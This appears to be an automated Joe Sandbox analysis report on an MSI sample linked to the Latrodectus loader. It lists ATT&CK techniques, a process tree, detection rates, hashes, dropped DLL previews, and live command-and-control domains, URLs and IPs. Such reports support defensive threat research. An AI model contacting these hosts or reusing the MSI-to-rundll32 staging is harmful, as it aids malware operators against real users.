Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | 1 Scheduled Task/Job | 11 Access Token Manipulation | 1 File Deletion | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 113 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Windows Service | 121 Masquerading | LSA Secrets | 47 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 112 Process Injection | 1 Valid Accounts | Cached Domain Credentials | 471 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Scheduled Task/Job | 12 Virtualization/Sandbox Evasion | DCSync | 12 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Access Token Manipulation | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 112 Process Injection | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Rundll32 | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 Remote System Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | Embedded Payloads | Keylogging | 21 System Network Configuration Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 1431940 | Sample: ad.msi | Start date: 26/04/2024 | Architecture: WINDOWS | Score: 100

Process tree recovered from the behavior graph (numbers after a process name are the per-process counters from the legend above):

Start: ad.msi
  Contacted domains: jarinamaers.shop, grizmotras.com
  Signatures: Found malware configuration; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 4 other signatures
  Started:
    rundll32.exe (2)
      Dropped: C:\Users\user\AppData\...\Update_77697333.dll (PE32+); :wtfbbq (copy) (PE32+)
      Signatures: Contains functionality to compare user and computer (likely to detect sandboxes); Contains functionality to detect sleep reduction / modifications
      Started:
        rundll32.exe (13)
          Network: jarinamaers.shop 104.21.46.75, port 443 (client ports 49714, 49715), CLOUDFLARENETUS, United States; grizmotras.com 172.67.219.28, port 443 (client ports 49718, 49719), CLOUDFLARENETUS, United States
          Signature: System process connects to network (likely due to code injection or exploit)
          Started:
            cmd.exe (1)
              Signatures: Uses ipconfig to lookup or modify the Windows network settings; Performs a network lookup / discovery via net view
              Started: conhost.exe; ipconfig.exe (1)
            cmd.exe (1)
              Started: conhost.exe; systeminfo.exe (2 1)
                systeminfo.exe
                  Signature: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Started: WmiPrvSE.exe
            cmd.exe (1)
              Started: conhost.exe; net.exe (1)
            2 other processes
              Started: conhost.exe; conhost.exe; 2 other processes
    msiexec.exe (9)
      Dropped: C:\Users\user\AppData\Local\...\MSID529.tmp (PE32); C:\Users\user\AppData\Local\...\MSID509.tmp (PE32); 4 other malicious files
    msiexec.exe (15 38)
      Dropped: C:\Windows\Installer\MSID8B1.tmp (PE32); C:\Windows\Installer\MSID719.tmp (PE32); C:\Windows\Installer\MSID69B.tmp (PE32); C:\Users\user\AppData\Local\...\360total.dll (PE32+)
      Signature: Drops executables to the windows directory (C:\Windows) and starts them
      Started: MSID8B1.tmp; msiexec.exe; msiexec.exe
    rundll32.exe

Source | Detection | Scanner
ad.msi | 8% | ReversingLabs
ad.msi | 8% | Virustotal

Source | Detection | Scanner
:wtfbbq (copy) | 5% | ReversingLabs
:wtfbbq (copy) | 14% | Virustotal
C:\Users\user\AppData\Local\Temp\MSID3EB.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSID3EB.tmp | 0% | Virustotal
C:\Users\user\AppData\Local\Temp\MSID498.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSID498.tmp | 0% | Virustotal
C:\Users\user\AppData\Local\Temp\MSID4B9.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSID4B9.tmp | 0% | Virustotal
C:\Users\user\AppData\Local\Temp\MSID4D9.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSID4D9.tmp | 0% | Virustotal
C:\Users\user\AppData\Local\Temp\MSID509.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSID509.tmp | 0% | Virustotal
C:\Users\user\AppData\Local\Temp\MSID529.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSID529.tmp | 0% | Virustotal
C:\Users\user\AppData\Local\sharepoint\360total.dll | 5% | ReversingLabs
C:\Users\user\AppData\Local\sharepoint\360total.dll | 14% | Virustotal
C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll | 5% | ReversingLabs
C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll | 14% | Virustotal
C:\Windows\Installer\MSID69B.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSID69B.tmp | 0% | Virustotal
C:\Windows\Installer\MSID719.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSID719.tmp | 0% | Virustotal
C:\Windows\Installer\MSID8B1.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSID8B1.tmp | 0% | Virustotal
                      No Antivirus matches
Source | Detection | Scanner
jarinamaers.shop | 1% | Virustotal
grizmotras.com | 1% | Virustotal
Source | Detection | Scanner | Label
ftp://ftp%2desktop.ini | 0% | Avira URL Cloud | safe
https://grizmotras.com/vider | 0% | Avira URL Cloud | safe
https://jarinamaers.shop/1 | 0% | Avira URL Cloud | safe
https://grizmotras.com/videri | 0% | Avira URL Cloud | safe
https://jarinamaers.shop/live/l | 0% | Avira URL Cloud | safe
https://grizmotras.com/ | 0% | Avira URL Cloud | safe
https://wrankaget.site/live/ | 0% | Avira URL Cloud | safe
https://jarinamaers.shop/G | 0% | Avira URL Cloud | safe
https://jarinamaers.shop/live/l | 1% | Virustotal |
https://pewwhranet.com/live/ | 0% | Avira URL Cloud | safe
https://wrankaget.site/live/ | 2% | Virustotal |
https://jarinamaers.shop/ | 0% | Avira URL Cloud | safe
https://grizmotras.com/live/ | 0% | Avira URL Cloud | safe
https://jarinamaers.shop/1 | 1% | Virustotal |
https://grizmotras.com/live/p | 0% | Avira URL Cloud | safe
https://grizmotras.com/ | 1% | Virustotal |
https://jarinamaers.shop/Y | 0% | Avira URL Cloud | safe
https://grizmotras.com/live/xe | 0% | Avira URL Cloud | safe
https://jarinamaers.shop/ | 0% | Virustotal |
https://jarinamaers.shop/live/ | 0% | Avira URL Cloud | safe
https://jarinamaers.shop/live/K | 0% | Avira URL Cloud | safe
https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin | 0% | Avira URL Cloud | safe
https://grizmotras.com/live/ | 0% | Virustotal |
https://jarinamaers.shop/live/ | 1% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
jarinamaers.shop | 104.21.46.75 | true | true | | unknown
grizmotras.com | 172.67.219.28 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://wrankaget.site/live/ | true | 2% Virustotal; Avira URL Cloud: safe | unknown
https://grizmotras.com/live/ | true | 0% Virustotal; Avira URL Cloud: safe | unknown
https://jarinamaers.shop/live/ | true | 1% Virustotal; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://jarinamaers.shop/1 | rundll32.exe, 00000007.00000003.3199082000.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
https://grizmotras.com/videri | rundll32.exe, 00000007.00000003.3199082000.0000024739B56000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://grizmotras.com/vider | rundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pconf.f.360.cn/safe_update.php | rundll32.exe | false | | high
https://jarinamaers.shop/live/l | rundll32.exe, 00000007.00000003.3199082000.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
ftp://ftp%2desktop.ini | rundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.dr | false | Avira URL Cloud: safe | low
https://grizmotras.com/ | rundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
https://jarinamaers.shop/G | rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pewwhranet.com/live/ | rundll32.exe, 00000007.00000003.3137465440.000002473BA70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137449195.000002473BAB0000.00000040.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jarinamaers.shop/ | rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmp | true | 0% Virustotal; Avira URL Cloud: safe | unknown
http://pscan.f.360.cn/safe_update.php | rundll32.exe | false | | high
http://dr.f.360.cn/scanlist | rundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.dr | false | | high
https://www.thawte.com/cps0 | ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr | false | | high
https://grizmotras.com/live/p | rundll32.exe, 00000007.00000003.3199082000.0000024739B27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3239328472.0000024739B23000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jarinamaers.shop/Y | rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/cli | rundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.dr | false | | high
https://www.thawte.com/repository0W | ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr | false | | high
https://grizmotras.com/live/xe | rundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://sconf.f.360.cn/client_security_conf | rundll32.exe | false | | high
https://jarinamaers.shop/live/K | rundll32.exe, 00000007.00000003.3199082000.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://dr.f.360.cn/scan | rundll32.exe | false | | high
https://www.advancedinstaller.com | ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr | false | | high
https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin | rundll32.exe, 00000007.00000003.3137465440.000002473BA70000.00000040.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.46.75 | jarinamaers.shop | United States | 13335 | CLOUDFLARENETUS | true
172.67.219.28 | grizmotras.com | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1431940
Start date and time: 2024-04-26 02:46:03 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ad.msi
Detection: MAL
Classification: mal100.spre.troj.evad.winMSI@38/31@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 40
• Number of non-executed functions: 328
Cookbook Comments:
• Found application associated with file extension: .msi
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
02:47:24 | API Interceptor | 5593916x Sleep call for process: rundll32.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
172.67.219.28 | 360total.dll.dll | malicious | Latrodectus

Match: jarinamaers.shop (Associated Sample Name / URL | Detection | Threat Name | Context)
Document_a19_79b555791-28h97348k5477-3219g9.js | malicious | Latrodectus | 172.67.136.103
360total.dll.dll | malicious | Latrodectus | 172.67.136.103

Match: grizmotras.com (Associated Sample Name / URL | Detection | Threat Name | Context)
Document_a19_79b555791-28h97348k5477-3219g9.js | malicious | Latrodectus | 104.21.59.82
360total.dll.dll | malicious | Latrodectus | 172.67.219.28
Util.dll | malicious | Bazar Loader, Latrodectus | 104.21.59.82
Match: CLOUDFLARENETUS (Associated Sample Name / URL | Detection | Threat Name | Context)
https://ndw5xvotehflt.pages.dev/smart89/ | malicious | Unknown | 104.21.53.38
https://cnmxukx5efilc7lvlel.pages.dev/smart89/ | malicious | Unknown | 172.66.44.161
https://m7qfa5ng4lp7.blob.core.windows.net/m7qfa5ng4lp7/1.html?4rKpnF7821CfLO43wsacrvmomp962ETPJQJTKIDNZNNV65316UFUY14332V14#14/43-7821/962-65316-14332 | malicious | Phisher | 104.18.26.50
https://bocmyw606y.pages.dev/smart89/ | malicious | Unknown | 172.66.44.172
https://uporniacomnuvidx.z13.web.core.windows.net/index.html | malicious | TechSupportScam | 104.17.25.14
https://markssmith.icu/23d80j2d/qwd13d8jqd/index.html?13813e8=0101%2048076%2044139&13813e8=https://playgames5.net | malicious | TechSupportScam | 104.21.12.42
https://tron2qk6vdl.z13.web.core.windows.net/Wind0s01Ersys44/index.html | malicious | TechSupportScam | 104.21.53.38
https://aulixalrrydrea.pages.dev/ | malicious | HTMLPhisher | 172.66.47.90
https://purexxfilmsjoybear.z13.web.core.windows.net/index.html | malicious | TechSupportScam | 104.18.11.207
https://pub-9af459faa3e54a63ae5d1f2be8790ad0.r2.dev/get-authenticated.html | malicious | Unknown | 104.16.123.96
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | Document_a19_79b555791-28h97348k5477-3219g9.js | malicious | Latrodectus
• 104.21.46.75
• 172.67.219.28
360total.dll.dll | malicious | Latrodectus
• 104.21.46.75
• 172.67.219.28
SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.32374.20351.xlsx | malicious | Unknown
• 104.21.46.75
• 172.67.219.28
SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe | malicious | FormBook, GuLoader
• 104.21.46.75
• 172.67.219.28
ProconGO1121082800.LnK.lnk | malicious | Unknown
• 104.21.46.75
• 172.67.219.28
file.exe | malicious | Clipboard Hijacker, RisePro Stealer
• 104.21.46.75
• 172.67.219.28
Version.125.7599.75.js | malicious | SocGholish
• 104.21.46.75
• 172.67.219.28
Database4.exe | malicious | Unknown
• 104.21.46.75
• 172.67.219.28
lzShU2RYJa.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar
• 104.21.46.75
• 172.67.219.28
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\MSID3EB.tmp | Document_a19_79b555791-28h97348k5477-3219g9.js | malicious | Latrodectus
avp.msi | malicious | Unknown
Cheater Pro 1.6.0.msi | malicious | Unknown
Cheat Lab 2.7.2.msi | malicious | Unknown
payload.js | malicious | Unknown
payload.js | malicious | Unknown
Doc_m42_81h118103-88o62135w8623-1999q9.js | malicious | Unknown
avp.msi | malicious | Unknown
sharepoint.msi | malicious | Unknown
:wtfbbq (copy) | Document_a19_79b555791-28h97348k5477-3219g9.js | malicious | Latrodectus
360total.dll.dll | malicious | Latrodectus
                                                                Process:C:\Windows\System32\rundll32.exe
                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):906752
                                                                Entropy (8bit):6.2833336520446625
                                                                Encrypted:false
                                                                SSDEEP:12288:gfPSAAUHV4fZUv/TrguVTax7hNRu18VA8JFoxMk/wYeDKDMyAmp:qPSAAUHV4fZUvfgmaxpu1F8J6xMYHMBS
                                                                MD5:74143402C40AC2E61E9F040A2D7E2D00
                                                                SHA1:4053DC85BB86C47C63F96681D6A62C21CD6342A3
                                                                SHA-256:1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
                                                                SHA-512:4AA55B859F15BE8B14C4A0FF6F3971F49B47C1C8C8427F179EB4AB0C76E321441ADFD173469FACB12AAE1E81E25F1328FD621214B42E66F690BA4E9EE1E54CF9
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                • Antivirus: Virustotal, Detection: 14%, Browse
                                                                Joe Sandbox View:
                                                                • Filename: Document_a19_79b555791-28h97348k5477-3219g9.js, Detection: malicious, Browse
                                                                • Filename: 360total.dll.dll, Detection: malicious, Browse
                                                                Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.*Ug.MPf.*Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..ByhDm^........P.........................@.........^EbkSBi$)eAX>u5kZ*^3GxY+_By3IAMem4Y^@h^vhh6CfaeU6j.....................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):1207
                                                                Entropy (8bit):5.671757573805521
                                                                Encrypted:false
                                                                SSDEEP:24:egyI269VE6jIMaI3I4iItRpU/FPPiNiDDhiSrokfXLK:eBO99jhaxt+b8PPiNiDD8Sr2
                                                                MD5:450C8CD21F938D9DE3DDB11B623C0794
                                                                SHA1:BC841061E5B478302A49DB39E9763C86F6016456
                                                                SHA-256:FB59730844CC246398429AD1FF121157B2E48B9F0F03F7FCA5B23C8CB0E56426
                                                                SHA-512:22B3CC2381C43F7FA293C81F547D12579D4706F3EA299A72576CCB121128E47101EF3A7198D03DDAF296810DDF4F12772F1E7208663BAE7A9F4F715857FBB4CE
                                                                Malicious:false
                                                                Preview:...@IXOS.@.....@...X.@.....@.....@.....@.....@.....@......&.{B135729E-0574-44D1-B7A1-6E44550F506B}..360 Total..ad.msi.@.....@.....@.....@........&.{805E70A6-23C0-4688-BBAF-6F995BB72730}.....@.....@.....@.....@.......@.....@.....@.......@......360 Total......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@......&.{ADF9F598-7B84-45C9-B1CA-E80968A538BA}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@........CreateFolders..Creating folders..Folder: [1]#.7.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..).C:\Users\user\AppData\Local\sharepoint\....5.C:\Users\user\AppData\Local\sharepoint\360total.dll....WriteRegistryValues..Writing system registry
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Joe Sandbox View:
                                                                • Filename: Document_a19_79b555791-28h97348k5477-3219g9.js, Detection: malicious, Browse
                                                                • Filename: avp.msi, Detection: malicious, Browse
                                                                • Filename: Cheater Pro 1.6.0.msi, Detection: malicious, Browse
                                                                • Filename: Cheat Lab 2.7.2.msi, Detection: malicious, Browse
                                                                • Filename: payload.js, Detection: malicious, Browse
                                                                • Filename: payload.js, Detection: malicious, Browse
                                                                • Filename: Doc_m42_81h118103-88o62135w8623-1999q9.js, Detection: malicious, Browse
                                                                • Filename: avp.msi, Detection: malicious, Browse
                                                                • Filename: sharepoint.msi, Detection: malicious, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
